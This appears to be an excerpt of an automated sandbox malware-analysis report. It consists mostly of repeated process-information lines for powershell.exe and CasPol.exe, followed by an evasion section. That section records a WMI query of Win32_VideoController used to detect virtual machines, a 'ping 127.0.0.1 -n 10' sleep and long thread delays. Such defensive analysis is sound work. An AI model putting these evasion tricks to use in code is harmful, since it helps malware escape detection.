                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                Uses ping.exe to sleep
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 3530000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: 1570000 memory reserve | memory write watchJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_00007FF887A286A9 sldt word ptr fs:[eax]9_2_00007FF887A286A9
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1497Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3800Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1436Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 660Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3468Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6381Jump to behavior
